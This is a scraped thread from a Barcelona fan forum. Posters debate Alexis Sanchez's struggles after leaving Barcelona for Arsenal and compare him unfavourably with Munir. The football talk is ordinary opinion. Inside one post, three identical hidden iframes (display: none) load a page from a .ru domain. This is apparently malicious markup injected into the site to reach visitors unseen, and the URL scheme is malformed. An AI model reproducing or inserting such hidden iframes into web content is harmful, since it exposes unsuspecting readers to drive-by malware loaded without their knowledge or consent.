Alexis Sanchez

ammarfcb

ze special one
didn't attack the box for a second. every team mate was lost for passes in the final 3rd.

the press are already on his back which is harsh but he deserves it for picking a city over a team.

F

Flavia

Another team, still not used the way to get the best out of him.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

didn't attack the box for a second. every team mate was lost for passes in the final 3rd.

the press are already on his back which is harsh but he deserves it for picking a city over a team.

Agree he should have picked Liverpool for both his own and for Liverpool´s sake.

serghei

People think Barça limited him, more like Barça made him look better it seems

Chile made him look even better. Same with Udinese.

So Udinese>Chile>Barcelona.

:coffee:

Sanchez needs time. He has buckets of talent and quality. That'll show sooner or later.

Blancone

Alexis was never really a Barca's level player. He was a good, even great player sometimes, but he wasm't the type of player that could win a match by himself like Messi or Neymar.

SwiftGuyver

i was half joking but in all seriousness i already feel much more calm & confident when Munir receives the ball then i ever did with Alexis.

Munir has the willingness to press, track back and work for the team but he's also a clinical finisher, a genuine natural goal scorer which Alexis isn't and never will be.

i'd say Munir already looks more comfortable in our starting lineup then Alexis ever did. maybe because he has come from La Masia but then again we all know that doesn't always mean a player slots into place as seemingly smoothly as Munir has so far.

Alexis is a very good player but Munir has the potential to be truly world class.

DB10

This is why I can't stand some 'pool fans/pundits/ex-players etc.. Make me cringe like no other team...take your RAWK hat of mate.

Wenger did Alexis no favours playing him away to Everton then subbing him at HT..That will really help with the confidence of easing into a new team/league.

Home of Barca Fans